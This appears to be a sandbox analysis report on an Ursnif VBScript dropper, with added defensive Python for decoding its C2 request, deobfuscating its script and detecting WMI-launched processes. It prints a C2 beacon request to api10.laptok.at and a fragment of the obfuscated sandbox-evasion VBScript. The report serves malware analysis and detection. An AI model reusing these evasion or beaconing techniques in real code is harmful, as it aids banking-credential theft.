Analysis Report WoXAp0Q0zaNl.vbs

Overview

General Information

Sample Name: WoXAp0Q0zaNl.vbs
Analysis ID: 283989
MD5: baa0a7597d2ebb9199a1e679dc96ea41
SHA1: bf2593d95a4b948cc702be4863dd994744e68033
SHA256: 23b57a9859e8c6d0f851ec43eef95689cd728e4b64087e2222f47158bf40bbb5

Most interesting Screenshot:

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\digram.it Virustotal: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\digram.it ReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted file
Source: WoXAp0Q0zaNl.vbs Virustotal: Detection: 21%
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: global traffic HTTP traffic detected (request line and headers, one per line):
GET /api1/YXIIEbjr/LKHsOdzDIb6srGqE_2F2Er6/HCbOtaiM62/3Ar3CmbW41bZrpoR_/2BGysJ7tJIut/_2BFAukfihC/tpgdEs38KtyYHo/kktDpMw4OLyq38u7ZBnvv/42Welbey1DQFDT5_/2BD_2F2IHF2O0r1/yrQwG6dWZ8DmHPk7oN/EbhuDrivI/J_2B_2BFq9IFGp8_2BI_/2FCylN_2BEo819KSTwa/0MXm2M1VxU28J3cJ4ol9MT/sZwPzVemSBoyC/1Lvtf_2B/yGj2SU2fE7V0Oth_2Foz_0A/_0DFm2ouNB/hfL_2Baahr1huA43q/Z1YUxW6qUxNZ/H_2B5MCMqWQ/nJi24tA8M_2Fov/zPX5bTYz9z/ohH HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: api10.laptok.at
Connection: Keep-Alive
Source: msapplication.xml1.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x46bd4534,0x01d687be</date><accdate>0x46bd4534,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x46bd4534,0x01d687be</date><accdate>0x46bd4534,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x46c209ca,0x01d687be</date><accdate>0x46c209ca,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x46c209ca,0x01d687be</date><accdate>0x46c209ca,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x46c46c38,0x01d687be</date><accdate>0x46c46c38,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x46c46c38,0x01d687be</date><accdate>0x46c46c38,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: global traffic HTTP traffic detected (status line and headers, one per line):
HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 10 Sep 2020 13:03:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip
Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: msapplication.xml.19.dr String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.19.dr String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.19.dr String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.19.dr String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.19.dr String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.19.dr String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.19.dr String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.19.dr String found in binary or memory: http://www.youtube.com/
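
The GET request and the 404 response above are the sample's only contact with api10.laptok.at. The Python below is an added example, not part of the report: it reverses the transport encoding of the request path and reassembles the chunked, gzip-compressed response body so both can be inspected. The reading of the path is an assumption that fits the tokens present: each `_XX` is a hex escape of one byte, so `_2B` and `_2F` restore the base64 characters `+` and `/` that would otherwise collide with URL syntax, `_0A` and `_0D` are line breaks, and the `/` separators were inserted after escaping (one token straddles a separator, `rpoR_/2BGys`). The decoded request bytes stay opaque here because Ursnif encrypts request data before encoding it and the key is not in this report. `encode_uri_transport` is this example's approximation of the forward direction, used only to round-trip test data; the `/api1/` handler name, the `every` segment length and the `_3D` escape for `=` are assumptions.

```python
"""Triage the C2 exchange logged above (added example, not part of the report)."""
import base64
import gzip
import re

# Request path exactly as logged in this report.
REPORT_URI = (
    "/api1/YXIIEbjr/LKHsOdzDIb6srGqE_2F2Er6/HCbOtaiM62/3Ar3CmbW41bZrpoR_/2BGysJ7tJIut/"
    "_2BFAukfihC/tpgdEs38KtyYHo/kktDpMw4OLyq38u7ZBnvv/42Welbey1DQFDT5_/2BD_2F2IHF2O0r1/"
    "yrQwG6dWZ8DmHPk7oN/EbhuDrivI/J_2B_2BFq9IFGp8_2BI_/2FCylN_2BEo819KSTwa/"
    "0MXm2M1VxU28J3cJ4ol9MT/sZwPzVemSBoyC/1Lvtf_2B/yGj2SU2fE7V0Oth_2Foz_0A/_0DFm2ouNB/"
    "hfL_2Baahr1huA43q/Z1YUxW6qUxNZ/H_2B5MCMqWQ/nJi24tA8M_2Fov/zPX5bTYz9z/ohH"
)

# "Data Raw" of the 404 response exactly as logged: a chunked body carrying gzip data.
RAW_404 = bytes.fromhex(
    "36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9"
    " 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54"
    " 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02"
    " 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a"
)

_ESC = re.compile(r"_([0-9A-Fa-f]{2})")


def decode_uri_transport(path: str, handler: str = "/api1/") -> bytes:
    """Reverse the path encoding: drop the inserted '/' separators first (a token can
    straddle one, see rpoR_/2BGys above), turn each _XX token back into byte 0xXX,
    discard the CR/LF that _0D/_0A become, and base64-decode what is left.  The result
    is the still-encrypted request; the key is not in the report."""
    blob = path[len(handler):] if path.startswith(handler) else path
    blob = blob.replace("/", "")
    blob = _ESC.sub(lambda m: chr(int(m.group(1), 16)), blob)
    blob = re.sub(r"\s+", "", blob)
    blob += "=" * (-len(blob) % 4)          # the logged path carries no '=' padding
    return base64.b64decode(blob, validate=True)


def encode_uri_transport(data: bytes, handler: str = "/api1/", every: int = 9) -> str:
    """Approximate forward direction, used to round-trip test data: base64, hex-escape
    the characters that would collide with URL syntax, then break the string with '/'.
    Real samples vary the segment lengths; 'every' and the '_3D' escape for '=' are
    assumptions of this example, not observed in the report."""
    esc = base64.b64encode(data).decode("ascii")
    esc = esc.replace("+", "_2B").replace("/", "_2F").replace("=", "_3D")
    return handler + "/".join(esc[i:i + every] for i in range(0, len(esc), every))


def decode_chunked_gzip(raw: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body and gunzip it."""
    body, pos = b"", 0
    while True:
        eol = raw.index(b"\r\n", pos)
        size = int(raw[pos:eol].split(b";")[0], 16)   # chunk-size; ignore chunk extensions
        pos = eol + 2
        if size == 0:
            break
        body += raw[pos:pos + size]
        pos += size + 2                                # step over the chunk's trailing CRLF
    return gzip.decompress(body)


if __name__ == "__main__":
    blob = decode_uri_transport(REPORT_URI)
    print(f"request payload: {len(blob)} bytes, first 16: {blob[:16].hex()}")
    print(decode_chunked_gzip(RAW_404).decode("ascii", "replace"))
```

Run as a script it prints the size of the encrypted request blob and the decompressed 404 page. The gzip trailer in the logged bytes gives the uncompressed length as 0x92 (146) bytes, which is the size of the stock nginx "404 Not Found" page; a body of that size is what an unregistered or unwanted client receives, and it is worth confirming in every such capture that no payload is hiding in an apparently empty error response.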

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

System Summary:

Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\digram.it A5B0036E0B2C73D3A8F47ED153CAA974EC04A870E06FB5F144C584B58B54DEC9
Java / VBScript file with very long strings (likely obfuscated code)
Source: WoXAp0Q0zaNl.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal96.troj.evad.winVBS@4/24@1/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs'
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WoXAp0Q0zaNl.vbs Virustotal: Detection: 21%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: WoXAp0Q0zaNl.vbs Static file information: File size 1177208 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\Rise\75\idea\toward\94\Scale\Live\34\Best\77\25\All\Whose.pdb source: digram.it.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface (script text as captured by AMSI, reflowed one statement per line; the capture starts mid-expression and is cut off at the end):
    WScript.ScriptName, cStr(702240904)) > 0 And Welles682 = 0) Then
    Exit Function' dutiful irredentist239 scopic Galbreath huckleberry example563 wastage Messiah clientele protozoan role merrymake Casanova alkaloid, circumpolar poesy derelict incapacity Chalmers tuple568 brindle syphilitic nightdress, 7557426 pietism hippodrome varnish Ackley libation chinquapin Daedalus might chiefdom eyeball Samson Chesterton vii buzzy bandwagon Calhoun Lyle formulate McKenzie intimater surpass anew upcome spinneret
    End If
    Set PEpttService = GetObject("winmgmts:\\.\root\cimv2")
    Set GJkCFmZlItems = PEpttService.ExecQuery("Select * from Win32_ComputerSystem")
    For Each hgYKL In GJkCFmZlItems' giggle713 doctrinal exchange impunity552 fable Huston clung hatchet367 swallow pickle319 aberrate emigrate columnar behead gardenia extempore340 Cervantes taboo aluminate384 Riordan screw74 poke tenement glutamine oddball175 subservient25 citizenry rakish926 annular spiritual, Lazarus betroth230 nostalgic Seattle Argive sandwich childish wallow. acrobatic ha calamus gaur nighttime concordant thistledown circumcision erratum, interregnum bashful lay195 Vanderpoel apotheosis870 Loire. 1890016 airflow814, Lockhart rebel hegemony auxiliary echo412 joyride onward broil sheepherder deputation workload718 exfoliate Laurent Hans
    GhbaI = GhbaI + Int((hgYKL.TotalPhysicalMemory) / ((1048658 - 79.0) - (72 + (-(1 + 68.0)))))
    REM embodiment, Guinevere, Vishnu kneel81 macaque706. burglar debonair ambrose456 lax hydroxyl wholly scuffle. wraith beneath minuscule86 sandpaper bruit parent mound502, televise viscount taxi quaff Archibald whack cohere40. 2161742 conserve shirt891 Hippocratic arc tularemia leeway chase flipflop sailor Blaine Jolla mulligan serve Gibson89 Giovanni. 7282276 opal, 9667674 reb, 278783 pterodactyl. bronze phone984 Aztec phosphate concision oh flake hectic moreover797 despoil tawny degumming hundredfold
    Next' conciliate advent. 4668633 carnation898 wire, 9922102 quixotic, drive refrigerate371, intricacy Dooley stupor Giuliano open763 county exogenous punctuate ancient Furman stowage vernal478 redshank digress amethystine breakpoint hodgepodge neutral infallible Mycenae oaken amoebae autocratic Carmen quadrangular coypu Edmonds periphrastic inapplicable collaborate penmen Wagner congratulatory messy. 3091313 loot guitar943
    If GhbaI < (((276 - 228.0) + (86 + 2760.0)) - 1864.0) Then' freshmen stagnant summit508 Hilbert tarpon tarantula tower252 sukiyaki dutiable Ella drill. 8689681 berry903 dictatorial antiquary dosimeter n949 claim. minima weave, corpuscular poisonous ecology stearic Stafford Fordham intellectual perspicuity telecommunicate310 Evans sapsucker. Wong roommate dexterity. Harlem wastewater Blum. 7341983 wakeup lore faithful invasion428 portrait78 vociferous floc184 tollhouse sourberry, Cretan964 ameliorate Ada. Elmira, primal freeload, beneficent oblate yaw ally Libya fiat daylight, 1604588 statuary candy216 orthodontist819 animadversion cocky stolid symp
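
The capture above is padded with junk-word comments and every numeric constant is spelled out as arithmetic, which is what the "very long strings" and "obfuscated calls" signatures react to. The Python below is an added example (not from the report and not the sample's own code) that strips `'` and `REM` comments and folds the parenthesised constant arithmetic with a whitelist-checked `ast` evaluator, so the two checks read as they execute: the divisor `((1048658 - 79.0) - (72 + (-(1 + 68.0))))` is 1048576, the number of bytes in a MiB, and the bound `(((276 - 228.0) + (86 + 2760.0)) - 1864.0)` is 1030. The script therefore sums `TotalPhysicalMemory` in MiB over `Win32_ComputerSystem` and compares it against 1030 MiB, a sandbox-sizing check; what it does below that bound is not in the capture, which is cut off after the `Then`. The embedded sample is abridged from the AMSI text above: statements verbatim, junk comments shortened, line breaks restored where VBScript needs them.

```python
"""Strip junk-comment padding and fold constant arithmetic in the captured VBScript
(added example; not part of the report)."""
import ast
import re

# Abridged from the AMSI capture in this report.  Statements are verbatim, the junk-word
# comments are shortened, and the first line is the truncated start of the capture.
SAMPLE = r"""WScript.ScriptName, cStr(702240904)) > 0 And Welles682 = 0) Then
Exit Function' dutiful irredentist239 scopic Galbreath huckleberry example563 wastage Messiah
End If
Set PEpttService = GetObject("winmgmts:\\.\root\cimv2")
Set GJkCFmZlItems = PEpttService.ExecQuery("Select * from Win32_ComputerSystem")
For Each hgYKL In GJkCFmZlItems' giggle713 doctrinal exchange impunity552 fable Huston clung
GhbaI = GhbaI + Int((hgYKL.TotalPhysicalMemory) / ((1048658 - 79.0) - (72 + (-(1 + 68.0)))))
REM embodiment, Guinevere, Vishnu kneel81 macaque706. burglar debonair ambrose456 lax hydroxyl
Next' conciliate advent. 4668633 carnation898 wire, 9922102 quixotic, drive refrigerate371
If GhbaI < (((276 - 228.0) + (86 + 2760.0)) - 1864.0) Then' freshmen stagnant summit508 Hilbert
"""

_REM = re.compile(r"^\s*REM\b", re.IGNORECASE)
_GROUP = re.compile(r"\(([^()]*)\)")                           # innermost parenthesised span
_NUMERIC = re.compile(r"[\d.\s+\-*/]*\d[\d.\s+\-*/]*")          # digits and arithmetic only
_BARE = re.compile(r"(?<![\w)])\(\s*([-+]?\d+(?:\.\d+)?)\s*\)")  # "(123)" not after a name
_CMP = re.compile(r"\b(\w+)\s*<\s*(\d+(?:\.\d+)?)\b")
_OK_NODES = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
             ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub, ast.UAdd)


def strip_comments(src: str) -> str:
    """Drop REM lines and everything after an apostrophe.  Caveat: a complete tokenizer
    must skip apostrophes inside string literals; this sample has none."""
    out = []
    for line in src.splitlines():
        if _REM.match(line):
            continue
        code = line.split("'", 1)[0].strip()
        if code:
            out.append(code)
    return "\n".join(out)


def _fold(m: re.Match) -> str:
    """Evaluate one innermost group if it is pure arithmetic; otherwise leave it alone."""
    expr = m.group(1)
    if not _NUMERIC.fullmatch(expr):
        return m.group(0)
    try:
        tree = ast.parse(expr.strip(), mode="eval")
        if not all(isinstance(n, _OK_NODES) for n in ast.walk(tree)):
            return m.group(0)
        value = eval(compile(tree, "<const>", "eval"), {"__builtins__": {}}, {})
    except (SyntaxError, ZeroDivisionError):
        return m.group(0)
    if isinstance(value, float) and value.is_integer():
        value = int(value)
    return f"({value})"


def fold_constants(text: str) -> str:
    """Fold innermost numeric groups and drop the parentheses around a bare number
    (never directly after an identifier, so Int(3) stays a call) until nothing changes."""
    while True:
        new = _BARE.sub(lambda m: m.group(1), _GROUP.sub(_fold, text))
        if new == text:
            return new
        text = new


def less_than_checks(code: str):
    """(variable, bound) for every 'x < <number>' comparison in the folded code."""
    return [(v, float(n)) for v, n in _CMP.findall(code)]


def deobfuscate(src: str) -> str:
    return fold_constants(strip_comments(src))


if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE)
    print(cleaned)
    print("thresholds:", less_than_checks(cleaned))
```

The evaluator only accepts literal numbers and the four arithmetic operators, so no identifier or call from the script can ever reach `eval`; anything else is left untouched and stays visible for manual review.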

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\digram.it
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\digram.it
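
`IWbemServices::ExecMethod ... Win32_Process::Create` (above, and again under System Summary) means the script asks the WMI service to start a process instead of calling `CreateProcess` itself. The child is then created by the WMI provider host, so its recorded parent is `WmiPrvSE.exe`, not `wscript.exe`, and any detection that relies on the parent-child link between the script host and what it launched misses the connection. The Python below is an added detection example, not part of the report: it runs two rules over constructed Sysmon Event ID 1-style records (a script host launched on a script under a user-writable path, and a non-allowlisted process whose parent is `WmiPrvSE.exe`) and raises an alert only when both occur on the same computer within a short window. Computer names, PIDs, timestamps and the WMI-launched child are hypothetical; only the `wscript.exe` command line mirrors this report, which does not say what the sample created via WMI.

```python
"""Tie WMI-launched processes back to the script host that requested them
(added detection example; the events are constructed, not taken from the report)."""
from datetime import datetime, timedelta

# Constructed Sysmon Event ID 1 style records.  Only the wscript.exe command line mirrors
# this report; hosts, PIDs, times and the WMI-launched child are hypothetical.
EVENTS = [
    {"UtcTime": "2020-09-10 13:03:01.000", "Computer": "ws01", "ProcessId": 6140,
     "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs"'},
    {"UtcTime": "2020-09-10 13:03:02.000", "Computer": "ws01", "ProcessId": 2344,
     "Image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"UtcTime": "2020-09-10 13:03:04.000", "Computer": "ws01", "ProcessId": 7012,
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd.exe /c echo placeholder"},
    {"UtcTime": "2020-09-10 13:20:00.000", "Computer": "ws02", "ProcessId": 5120,
     "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe"},
    {"UtcTime": "2020-09-10 14:05:00.000", "Computer": "ws01", "ProcessId": 8800,
     "Image": r"C:\Windows\System32\cscript.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cscript.exe //nologo "C:\Scripts\inventory.vbs"'},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
USER_PATH_HINTS = ("\\users\\", "\\appdata\\", "\\desktop\\", "\\downloads\\", "\\temp\\")
ALLOWED_WMI_CHILDREN = {"werfault.exe"}       # hypothetical allowlist; tune per estate


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _ts(ev: dict) -> datetime:
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S.%f")


def is_script_host_from_user_path(ev: dict) -> bool:
    """wscript/cscript started on a script that lives in a user-writable location."""
    cmd = ev["CommandLine"].lower()
    return _base(ev["Image"]) in SCRIPT_HOSTS and any(h in cmd for h in USER_PATH_HINTS)


def is_wmi_spawned(ev: dict) -> bool:
    """Win32_Process.Create makes WmiPrvSE.exe the parent, so the real requester is not
    in the parent field.  Anything non-allowlisted under WmiPrvS E.exe deserves a look."""
    return (_base(ev["ParentImage"]) == "wmiprvse.exe"
            and _base(ev["Image"]) not in ALLOWED_WMI_CHILDREN)


def correlate(events, window: timedelta = timedelta(minutes=5)):
    """Pair each WMI-spawned process with a script host started shortly before it on the
    same computer.  The pair is the alert: neither event alone proves the link."""
    hosts = [e for e in events if is_script_host_from_user_path(e)]
    alerts = []
    for child in events:
        if not is_wmi_spawned(child):
            continue
        for s in hosts:
            gap = _ts(child) - _ts(s)
            if s["Computer"] == child["Computer"] and timedelta(0) <= gap <= window:
                alerts.append({"computer": child["Computer"],
                               "script_pid": s["ProcessId"], "script_cmd": s["CommandLine"],
                               "child_pid": child["ProcessId"], "child_image": child["Image"],
                               "gap_seconds": gap.total_seconds()})
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a)
```

Security event 4688 with its Creator Process Name field serves equally well as the input. Management and monitoring agents also launch children through `WmiPrvSE.exe`, which is why the second rule is not an alert on its own and why the allowlist exists; the time window and the user-path requirement on the script host keep the pairing tight.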

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\woxap0q0zanl.vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation (4 occurrences)
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\wscript.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\wscript.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\digram.it
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 7088 Thread sleep time: -30000s >= -30000s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
